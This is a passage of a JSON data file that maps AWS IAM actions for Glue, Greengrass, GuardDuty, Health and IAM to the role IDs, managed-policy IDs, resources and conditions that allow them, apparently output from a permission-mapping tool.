{"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:CreateUserDefinedFunction": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:DeleteDatabase": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:DeletePartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:DeleteTable": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:DeleteUserDefinedFunction": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetDatabase": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetDatabases": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetPartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetPartitions": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetTable": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetTableVersions": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetTables": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetUserDefinedFunction": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:GetUserDefinedFunctions": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:UpdateDatabase": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:UpdatePartition": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:UpdateTable": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:UpdateUserDefinedFunction": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"glue:batchGetPartition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getCatalogImportStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getClassifier": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getClassifiers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getCrawler": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getCrawlerMetrics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getCrawlers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getDatabase": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getDatabases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getDataflowGraph": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getDevEndpoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getDevEndpoints": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getJobRun": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getJobRuns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getMapping": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getPartition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getPartitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getTable": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getTableVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getTables": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getTrigger": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getTriggers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getUserDefinedFunction": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"glue:getUserDefinedFunctions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getConnectivityInfo": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getCoreDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getCoreDefinitionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getDeploymentStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getDeviceDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getDeviceDefinitionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getFunctionDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getFunctionDefinitionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getGroupCertificateAuthority": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getGroupVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getLoggerDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getLoggerDefinitionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getResourceDefinitionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getServiceRoleForAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getSubscriptionDefinition": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:getSubscriptionDefinitionVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listCoreDefinitionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listCoreDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listDeployments": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listDeviceDefinitionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listDeviceDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listFunctionDefinitionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listFunctionDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listGroupVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listLoggerDefinitionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listLoggerDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listResourceDefinitionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listResourceDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listSubscriptionDefinitionVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"greengrass:listSubscriptionDefinitions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getDetector": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getFindings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getFindingsStatistics": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getIPSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getInvitationsCount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getMasterAccount": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:getThreatIntelSet": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:listDetectors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:listFindings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:listIPSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:listInvitations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:listMembers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"guardduty:listThreatIntelSets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"health:describeAffectedEntities": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"health:describeEntityAggregates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"health:describeEventAggregates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"health:describeEventDetails": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"health:describeEventTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"health:describeEvents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:CreateServiceLinkedRole": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"arn:aws:iam::*:role/aws-service-role/spot.amazonaws.com/AWSServiceRoleForEC2Spot*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": {"StringLike": {"iam:AWSServiceName": "spot.amazonaws.com"}}}}}}}}}},"iam:DeleteRole": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"arn:aws:iam::*:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:GenerateCredentialReport": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"iam:GetAccountPasswordPolicy": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"iam:GetAccountSummary": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"iam:GetCredentialReport": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"iam:GetRole": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"iam:GetRolePolicy": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"iam:GetServerCertificate": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"iam:ListInstanceProfiles": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"iam:ListRolePolicies": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"iam:ListServerCertificates": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"iam:PassRole": {"roles": {"Allow": {"AROAIXBSWIKGEEDLMO53I": {"Resource": {"*": {"policies": {"ANPAIDI2BQT2LKXZG36TW": {"condition": null}}}}}}}},"iam:getAccessKeyLastUsed": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getAccountAuthorizationDetails": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getAccountPasswordPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getAccountSummary": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getContextKeysForCustomPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getContextKeysForPrincipalPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getCredentialReport": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getGroupPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getInstanceProfile": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getLoginProfile": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getOpenIDConnectProvider": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getPolicyVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getRole": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getRolePolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getSAMLProvider": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getSSHPublicKey": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getServerCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:getUserPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listAccessKeys": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listAccountAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listAttachedGroupPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listAttachedRolePolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listAttachedUserPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listEntitiesForPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listGroupPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listGroupsForUser": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listInstanceProfiles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listInstanceProfilesForRole": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listMFADevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listOpenIDConnectProviders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listPolicyVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listRolePolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listRoles": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listSAMLProviders": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listSSHPublicKeys": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listServerCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listSigningCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listUserPolicies": {"roles": {"Allow": 